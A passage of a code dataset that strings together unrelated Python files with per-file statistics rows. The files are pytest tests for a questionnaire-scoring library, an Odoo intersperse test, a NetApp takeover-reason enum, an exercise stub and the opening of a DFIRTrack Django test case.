assert_frame_equal(out, expected_out)
@pytest.mark.parametrize(
"data, offset, cols, inplace, expected_in, expected_out",
[
(
pd.Series([1, 2, 3, 2, 1, 3]),
-1,
None,
False,
pd.Series([1, 2, 3, 2, 1, 3]),
pd.Series([0, 1, 2, 1, 0, 2]),
),
(
pd.Series([1, 2, 3, 2, 1, 3]),
-1,
["A"],
False,
pd.Series([1, 2, 3, 2, 1, 3]),
pd.Series([0, 1, 2, 1, 0, 2]),
),
(
pd.Series([1, 2, 3, 2, 1, 3]),
-1,
None,
True,
pd.Series([0, 1, 2, 1, 0, 2]),
None,
),
],
)
def test_convert_scale_series(self, data, offset, cols, inplace, expected_in, expected_out):
out = convert_scale(data=data, offset=offset, cols=cols, inplace=inplace)
assert_series_equal(data, expected_in)
if expected_out is not None:
assert_series_equal(out, expected_out)
@pytest.mark.parametrize(
"data, score_range, set_nan, expected",
[
(np.array([[1, 2], [3, 4], [5, 6]]), [1, 0], None, pytest.raises(ValidationError)),
(pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}), [1, 2, 3], False, pytest.raises(ValidationError)),
(pd.DataFrame({"A": [1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}), [1, 5], False, does_not_raise()),
],
)
def test_crop_scale_raises(self, data, score_range, set_nan, expected):
with expected:
crop_scale(data=data, score_range=score_range, set_nan=set_nan)
@pytest.mark.parametrize(
"data, score_range, set_nan, inplace, expected_in, expected_out",
[
(
pd.DataFrame({"A": [-1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}),
[1, 5],
False,
False,
pd.DataFrame({"A": [-1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}),
pd.DataFrame({"A": [1, 4, 5], "B": [2, 3, 5], "C": [1, 3, 5]}),
),
(
pd.DataFrame({"A": [-1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}),
[1, 5],
False,
True,
pd.DataFrame({"A": [1, 4, 5], "B": [2, 3, 5], "C": [1, 3, 5]}),
None,
),
(
pd.DataFrame({"A": [-1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}),
[1, 5],
True,
False,
pd.DataFrame({"A": [-1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}),
pd.DataFrame({"A": [np.nan, 4, np.nan], "B": [2, 3, np.nan], "C": [1, 3, np.nan]}),
),
(
pd.DataFrame({"A": [-1, 4, 8], "B": [2, 3, 7], "C": [1, 3, 6]}),
[1, 5],
True,
True,
pd.DataFrame({"A": [np.nan, 4, np.nan], "B": [2, 3, np.nan], "C": [1, 3, np.nan]}),
None,
),
],
)
def test_crop_scale(self, data, score_range, set_nan, inplace, expected_in, expected_out):
out = crop_scale(data=data, score_range=score_range, inplace=inplace, set_nan=set_nan)
assert_frame_equal(data, expected_in)
if expected_out is not None:
assert_frame_equal(out, expected_out)
@pytest.mark.parametrize(
"data, score_range, set_nan, inplace, expected_in, expected_out",
[
(
pd.Series([-1, 4, 8, 2, 3, 7, 1, 3, 6]),
[1, 5],
False,
False,
pd.Series([-1, 4, 8, 2, 3, 7, 1, 3, 6]),
pd.Series([1, 4, 5, 2, 3, 5, 1, 3, 5]),
),
(
pd.Series([-1, 4, 8, 2, 3, 7, 1, 3, 6]),
[1, 5],
False,
True,
pd.Series([1, 4, 5, 2, 3, 5, 1, 3, 5]),
None,
),
(
pd.Series([-1, 4, 8, 2, 3, 7, 1, 3, 6]),
[1, 5],
True,
False,
pd.Series([-1, 4, 8, 2, 3, 7, 1, 3, 6]),
pd.Series([np.nan, 4, np.nan, 2, 3, np.nan, 1, 3, np.nan]),
),
(
pd.Series([-1, 4, 8, 2, 3, 7, 1, 3, 6]),
[1, 5],
True,
True,
pd.Series([np.nan, 4, np.nan, 2, 3, np.nan, 1, 3, np.nan]),
None,
),
],
)
def test_crop_scale_series(self, data, score_range, set_nan, inplace, expected_in, expected_out):
out = crop_scale(data=data, score_range=score_range, inplace=inplace, set_nan=set_nan)
assert_series_equal(data, expected_in)
if expected_out is not None:
assert_series_equal(out, expected_out)
@pytest.mark.parametrize(
"data, bins, cols, first_min, last_max, inplace, expected_in, expected_out",
[
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
False,
False,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [np.nan, np.nan, 0, 7, 1, 0, 6, np.nan],
"B": [2, 5, np.nan, 4, 4, 6, 1, np.nan],
"C": [5, 1, np.nan, np.nan, 0, 1, 1, np.nan],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
False,
True,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [np.nan, np.nan, 0, 7, 1, 0, 6, 8],
"B": [2, 5, np.nan, 4, 4, 6, 1, np.nan],
"C": [5, 1, 8, np.nan, 0, 1, 1, np.nan],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
True,
False,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [0, 0, 1, 8, 2, 1, 7, np.nan],
"B": [3, 6, 0, 5, 5, 7, 2, 0],
"C": [6, 2, np.nan, 0, 1, 2, 2, 0],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
True,
True,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [0, 0, 1, 8, 2, 1, 7, 9],
"B": [3, 6, 0, 5, 5, 7, 2, 0],
"C": [6, 2, 9, 0, 1, 2, 2, 0],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
[5, 14, 25, 45],
None,
False,
False,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
pd.DataFrame(
{
"A": [np.nan, 0, 0, np.nan, 1, 1, np.nan, np.nan],
"B": [2, np.nan, np.nan, np.nan, np.nan, np.nan, 1, np.nan],
"C": [np.nan, 1, np.nan, 0, 0, 2, 1, 0],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
[5, 14, 25, 45],
None,
True,
False,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
pd.DataFrame(
{
"A": [0, 1, 1, np.nan, 2, 2, np.nan, np.nan],
"B": [3, np.nan, 0, np.nan, np.nan, np.nan, 2, 0],
"C": [np.nan, 1, np.nan, 0, 0, 2, 1, 0],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
[5, 14, 25, 45],
None,
True,
True,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
pd.DataFrame(
{
"A": [0, 1, 1, 4, 2, 2, 4, 4],
"B": [3, 4, 0, 4, 4, 4, 2, 0],
"C": [3, 1, 3, 0, 0, 2, 1, 0],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
[5, 14, 25, 45],
None,
True,
True,
True,
pd.DataFrame(
{
"A": [0, 1, 1, 4, 2, 2, 4, 4],
"B": [3, 4, 0, 4, 4, 4, 2, 0],
"C": [3, 1, 3, 0, 0, 2, 1, 0],
}
),
None,
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 7],
}
),
5,
None,
True,
True,
True,
pd.DataFrame(
{
"A": [0, 0, 0, 4, 1, 0, 3, 4],
"B": [2, 4, 0, 3, 3, 4, 1, 0],
"C": [3, 1, 4, 0, 0, 1, 1, 0],
}
),
None,
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
["A"],
False,
True,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [np.nan, np.nan, 0, 7, 1, 0, 6, 8],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
["B", "C"],
False,
True,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [2, 5, np.nan, 4, 4, 6, 1, np.nan],
"C": [5, 1, 8, np.nan, 0, 1, 1, np.nan],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
[1, 2],
False,
True,
False,
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [2, 5, np.nan, 4, 4, 6, 1, np.nan],
"C": [5, 1, 8, np.nan, 0, 1, 1, np.nan],
}
),
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
["A"],
True,
False,
True,
pd.DataFrame(
{
"A": [0, 0, 1, 8, 2, 1, 7, np.nan],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
None,
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
"A",
True,
False,
True,
pd.DataFrame(
{
"A": [0, 0, 1, 8, 2, 1, 7, np.nan],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
None,
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
[0],
True,
False,
True,
pd.DataFrame(
{
"A": [0, 0, 1, 8, 2, 1, 7, np.nan],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
None,
),
(
pd.DataFrame(
{
"A": [1, 10, 14, 90, 24, 16, 73, 97],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
0,
True,
False,
True,
pd.DataFrame(
{
"A": [0, 0, 1, 8, 2, 1, 7, np.nan],
"B": [34, 64, 2, 58, 54, 76, 23, 5],
"C": [65, 24, 95, 6, 12, 26, 24, 0],
}
),
None,
),
],
)
def test_bin_scale(self, data, bins, cols, first_min, last_max, inplace, expected_in, expected_out):
out = bin_scale(data=data, bins=bins, cols=cols, first_min=first_min, last_max=last_max, inplace=inplace)
assert_frame_equal(data, expected_in)
if expected_out is not None:
assert_frame_equal(out, expected_out)
@pytest.mark.parametrize(
"data, bins, cols, first_min, last_max, inplace, expected_in, expected_out",
[
(
pd.Series([1, 10, 14, 90, 24, 16, 73, 97]),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
False,
False,
False,
pd.Series([1, 10, 14, 90, 24, 16, 73, 97]),
pd.Series([np.nan, np.nan, 0, 7, 1, 0, 6, np.nan]),
),
(
pd.Series([34, 64, 2, 58, 54, 76, 23, 5]),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
False,
False,
False,
pd.Series([34, 64, 2, 58, 54, 76, 23, 5]),
pd.Series([2, 5, np.nan, 4, 4, 6, 1, np.nan]),
),
(
pd.Series([65, 24, 95, 6, 12, 26, 24, 0]),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
False,
False,
False,
pd.Series([65, 24, 95, 6, 12, 26, 24, 0]),
pd.Series([5, 1, np.nan, np.nan, 0, 1, 1, np.nan]),
),
(
pd.Series([1, 10, 14, 90, 24, 16, 73, 97]),
[10, 20, 30, 40, 50, 60, 70, 80, 90],
None,
False,
True,
False,
pd.Series([1, 10, 14, 90, 24, 16, 73, 97]),
pd.Series([np.nan, np.nan, 0, 7, 1, 0, 6, 8]),
),
(
pd.Series([1, 10, 14, 90, 24, 16, 73, 97]),
[5, 14, 25, 45],
None,
True,
False,
False,
pd.Series([1, 10, 14, 90, 24, 16, 73, 97]),
pd.Series([0, 1, 1, np.nan, 2, 2, np.nan, np.nan]),
),
],
)
def test_bin_scale_series(self, data, bins, cols, first_min, last_max, inplace, expected_in, expected_out):
out = bin_scale(data=data, bins=bins, cols=cols, first_min=first_min, last_max=last_max, inplace=inplace)
assert_series_equal(data, expected_in)
if expected_out is not None:
assert_series_equal(out, expected_out)
def test_wide_to_long_warning(self):
# just make sure that DeprecationWarning is issued, functionality will be tested in other functions
with pytest.warns(DeprecationWarning):
wide_to_long(
pd.DataFrame({"A_Pre": [0, 1], "A_Post": [0, 1]}, index=pd.Index([0, 1], name="subject")),
quest_name="A",
levels="time",
)
def test_get_supported_questionnaires(self):
quests = get_supported_questionnaires()
assert all(isinstance(s, str) for s in quests.keys())
assert all(isinstance(s, str) for s in quests.values())
@pytest.mark.parametrize(
"data, quest_dict, quest_kwargs, expected",
[
(
data_complete_correct(),
{"abc": ["ADSL_{}".format(i) for i in range(1, 21)]},
None,
pytest.raises(ValueError),
),
(
data_complete_correct(),
{"ads_l": ["ADSL_{}".format(i) for i in range(1, 21)]},
{"ads_l": {"subscales": []}},
pytest.raises(TypeError),
),
(data_complete_correct(), {"ads_l": ["ADSL_{}".format(i) for i in range(1, 21)]}, None, does_not_raise()),
(
data_complete_correct(),
{"panas": ["PANAS_{}".format(i) for i in range(1, 21)]},
{"panas": {"subscales": []}},
pytest.raises(TypeError),
),
(
data_complete_correct(),
{"panas": ["PANAS_{}".format(i) for i in range(1, 21)]},
{"panas": {"language": "english"}},
does_not_raise(),
),
(
data_complete_correct(),
{"FEE": ["FEE_{}_{}".format(i, j) for i, j in product(range(1, 25), ["Vater", "Mutter"])]},
{"FEE": {"language": "german"}},
does_not_raise(),
),
(
data_complete_correct(),
{"fee": ["FEE_{}_{}".format(i, j) for i, j in product(range(1, 25), ["Vater", "Mutter"])]},
{"fee": {"language": "german"}},
does_not_raise(),
),
(
data_complete_correct(),
{"FEE": ["FEE_{}_{}".format(i, j) for i, j in product(range(1, 25), ["Vater", "Mutter"])]},
{"fee": {"language": "german"}},
pytest.raises(ValidationError),
),
(
data_complete_correct(),
{"svf_120": ["SVF120_{}".format(i) for i in range(1, 121)]},
{"svf_120": {"subscales": {"Bag": [10, 31, 50, 67, 88, 106]}}},
does_not_raise(),
),
(
data_pre_post(),
{
"panas-pre": ["PANAS_{}_Pre".format(i) for i in range(1, 21)],
"panas-post": ["PANAS_{}_Post".format(i) for i in range(1, 21)],
},
None,
does_not_raise(),
),
],
)
def test_get_compute_scores_raises(self, data, quest_dict, quest_kwargs, expected):
with expected:
compute_scores(data=data, quest_dict=quest_dict, quest_kwargs=quest_kwargs)
@pytest.mark.parametrize(
"data, quest_dict, quest_kwargs, expected",
[
(
data_compute_scores(),
{
"pss": ["PSS_{}".format(i) for i in range(1, 11)],
"fee": ["FEE_{}_{}".format(i, j) for i, j in product(range(1, 25), ["Vater", "Mutter"])],
"panas-pre": ["PANAS_{}_Pre".format(i) for i in range(1, 21)],
"panas-post": ["PANAS_{}_Post".format(i) for i in range(1, 21)],
"svf_120": ["SVF120_{}".format(i) for i in range(1, 121)],
},
{"fee": {"language": "german"}, "svf_120": {"subscales": {"Bag": [10, 31, 50, 67, 88, 106]}}},
data_results_compute_scores(),
)
],
)
def test_get_compute_scores(self, data, quest_dict, quest_kwargs, expected):
out = compute_scores(data=data, quest_dict=quest_dict, quest_kwargs=quest_kwargs)
assert_frame_equal(expected, out)
| 35.954939 | 120 | 0.338475 | 4,630 | 41,492 | 2.932181 | 0.046004 | 0.098041 | 0.098114 | 0.076606 | 0.849293 | 0.830068 | 0.819313 | 0.790439 | 0.773866 | 0.749337 | 0 | 0.138298 | 0.490263 | 41,492 | 1,153 | 121 | 35.986123 | 0.503593 | 0.002338 | 0 | 0.681982 | 0 | 0 | 0.050878 | 0.003624 | 0 | 0 | 0 | 0 | 0.023423 | 1 | 0.020721 | false | 0 | 0.010811 | 0 | 0.036036 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3f6cf27b64e507b4eecc5e689bd24f9c8c9bbf3d | 2,120 | py | Python | odoo-13.0/odoo/addons/base/tests/test_res_lang.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 12 | 2021-03-26T08:39:40.000Z | 2022-03-16T02:20:10.000Z | odoo-13.0/odoo/addons/base/tests/test_res_lang.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 13 | 2020-12-20T16:00:21.000Z | 2022-03-14T14:55:30.000Z | odoo-13.0/odoo/addons/base/tests/test_res_lang.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 17 | 2020-08-31T11:18:49.000Z | 2022-02-09T05:57:31.000Z | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.tests.common import TransactionCase
class test_res_lang(TransactionCase):
def test_00_intersperse(self):
from odoo.addons.base.models.res_lang import intersperse
assert intersperse("", []) == ("", 0)
assert intersperse("0", []) == ("0", 0)
assert intersperse("012", []) == ("012", 0)
assert intersperse("1", []) == ("1", 0)
assert intersperse("12", []) == ("12", 0)
assert intersperse("123", []) == ("123", 0)
assert intersperse("1234", []) == ("1234", 0)
assert intersperse("123456789", []) == ("123456789", 0)
assert intersperse("&ab%#@1", []) == ("&ab%#@1", 0)
assert intersperse("0", []) == ("0", 0)
assert intersperse("0", [1]) == ("0", 0)
assert intersperse("0", [2]) == ("0", 0)
assert intersperse("0", [200]) == ("0", 0)
assert intersperse("12345678", [1], '.') == ('1234567.8', 1)
assert intersperse("12345678", [1], '.') == ('1234567.8', 1)
assert intersperse("12345678", [2], '.') == ('123456.78', 1)
assert intersperse("12345678", [2,1], '.') == ('12345.6.78', 2)
assert intersperse("12345678", [2,0], '.') == ('12.34.56.78', 3)
assert intersperse("12345678", [-1,2], '.') == ('12345678', 0)
assert intersperse("12345678", [2,-1], '.') == ('123456.78', 1)
assert intersperse("12345678", [2,0,1], '.') == ('12.34.56.78', 3)
assert intersperse("12345678", [2,0,0], '.') == ('12.34.56.78', 3)
assert intersperse("12345678", [2,0,-1], '.') == ('12.34.56.78', 3)
assert intersperse("12345678", [3,3,3,3], '.') == ('12.345.678', 2)
assert intersperse("abc1234567xy", [2], '.') == ('abc1234567.xy', 1)
assert intersperse("abc1234567xy8", [2], '.') == ('abc1234567x.y8', 1) # ... w.r.t. here.
assert intersperse("abc12", [3], '.') == ('abc12', 0)
assert intersperse("abc12", [2], '.') == ('abc12', 0)
assert intersperse("abc12", [1], '.') == ('abc1.2', 1)
| 49.302326 | 97 | 0.516981 | 244 | 2,120 | 4.471311 | 0.266393 | 0.451879 | 0.263978 | 0.166819 | 0.493126 | 0.353804 | 0.353804 | 0.313474 | 0.243813 | 0.210816 | 0 | 0.206687 | 0.224057 | 2,120 | 42 | 98 | 50.47619 | 0.456535 | 0.052358 | 0 | 0.121212 | 0 | 0 | 0.181047 | 0 | 0 | 0 | 0 | 0 | 0.878788 | 1 | 0.030303 | false | 0 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3f7299599e6160ba207a0d799fab9da9241f798c | 1,539 | py | Python | generated-libraries/python/netapp/cf/takeover_reason.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/cf/takeover_reason.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/cf/takeover_reason.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | class TakeoverReason(basestring):
"""
FM Takeover Reason
Possible values:
<ul>
<li> "takeover_none" - None,
<li> "takeover_immediate" - Immediate takeover,
<li> "takeover_ndu" - NDU Takeover,
<li> "takeover_forced" - Forced Takeover,
<li> "takeover_disaster" - Disaster Takeover,
<li> "takeover_early" - Early Takeover,
<li> "takeover_operator_exp" - Takeover Operator Timeout,
<li> "takeover_post_failed" - Takeover POST Failed,
<li> "takeover_panic" - Takeover On Panic,
<li> "takeover_shortuptime" - Takeover On Short Uptime,
<li> "takeover_sparecore_exp" - Takeover On Sparecore
Timeout,
<li> "takeover_reboot_exp" - Takeover On Reboot Timeout,
<li> "takeover_booting_exp" - Takeover On Booting Timeout,
<li> "takeover_firmware_exp" - Takeover On Firmware
Timeout,
<li> "takeover_nfo_shutdown" - Takeover On Negotiated
Failover,
<li> "takeover_nfo_timer" - Takeover On Negotiated
Failover Timeout,
<li> "takeover_mdp" - Takeover On MDP,
<li> "takeover_reboot" - Takeover On Reboot,
<li> "takeover_halt" - Takeover On Halt,
<li> "takeover_clam" - CLAM Initiated Takeover,
<li> "takeover_hwassist" - H/w assisted Takeover,
<li> "takeover_normal" - Operator initiated takeover
</ul>
"""
@staticmethod
def get_api_name():
return "takeover-reason"
| 39.461538 | 65 | 0.613385 | 160 | 1,539 | 5.7 | 0.3125 | 0.241228 | 0.138158 | 0.061404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.28655 | 1,539 | 38 | 66 | 40.5 | 0.830601 | 0.832359 | 0 | 0 | 0 | 0 | 0.119048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0.25 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
58fae3ad75844494279e2d4fa1a4d783a2b55ea4 | 77 | py | Python | exercises/pascals-triangle/pascals_triangle.py | RJTK/python | f9678d629735f75354bbd543eb7f10220a498dae | [
"MIT"
] | 1 | 2021-05-15T19:59:04.000Z | 2021-05-15T19:59:04.000Z | exercises/pascals-triangle/pascals_triangle.py | RJTK/python | f9678d629735f75354bbd543eb7f10220a498dae | [
"MIT"
] | null | null | null | exercises/pascals-triangle/pascals_triangle.py | RJTK/python | f9678d629735f75354bbd543eb7f10220a498dae | [
"MIT"
] | 2 | 2018-03-03T08:32:12.000Z | 2019-08-22T11:55:53.000Z | def triangle():
pass
def is_triangle():
pass
def row():
pass
| 7 | 18 | 0.558442 | 10 | 77 | 4.2 | 0.5 | 0.571429 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.324675 | 77 | 10 | 19 | 7.7 | 0.807692 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
45199b7ff71e327195dffa65d317478de473107a | 14,555 | py | Python | dfirtrack_artifacts/tests/artifact/test_artifact_creator_views.py | thomas-kropeit/dfirtrack | b1e0e659af7bc8085cfe2d269ddc651f9f4ba585 | [
"Apache-2.0"
] | 273 | 2018-04-18T22:09:15.000Z | 2021-06-04T09:15:48.000Z | dfirtrack_artifacts/tests/artifact/test_artifact_creator_views.py | stuhli/dfirtrack | 9260c91e4367b36d4cb1ae7efe4e2d2452f58e6e | [
"Apache-2.0"
] | 75 | 2018-08-31T11:05:37.000Z | 2021-06-08T14:15:07.000Z | dfirtrack_artifacts/tests/artifact/test_artifact_creator_views.py | thomas-kropeit/dfirtrack | b1e0e659af7bc8085cfe2d269ddc651f9f4ba585 | [
"Apache-2.0"
] | 61 | 2018-11-12T22:55:48.000Z | 2021-06-06T15:16:16.000Z | import urllib.parse
from django.contrib.auth.models import User
from django.contrib.messages import get_messages
from django.test import TestCase
from dfirtrack_artifacts.models import (
Artifact,
Artifactpriority,
Artifactstatus,
Artifacttype,
)
from dfirtrack_main.models import System, Systemstatus
class ArtifactCreatorViewTestCase(TestCase):
"""artifact creator view tests"""
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# create objects
Artifactpriority.objects.create(artifactpriority_name='artifactpriority_1')
Artifactstatus.objects.create(artifactstatus_name='artifactstatus_1')
# create objects
Artifacttype.objects.create(artifacttype_name='artifact_creator_artifacttype_1')
Artifacttype.objects.create(artifacttype_name='artifact_creator_artifacttype_2')
Artifacttype.objects.create(artifacttype_name='artifact_creator_artifacttype_3')
# create object
systemstatus_1 = Systemstatus.objects.create(systemstatus_name='systemstatus_1')
# create objects
System.objects.create(
system_name='artifact_creator_system_1',
systemstatus=systemstatus_1,
system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
System.objects.create(
system_name='artifact_creator_system_2',
systemstatus=systemstatus_1,
system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
System.objects.create(
system_name='artifact_creator_system_3',
systemstatus=systemstatus_1,
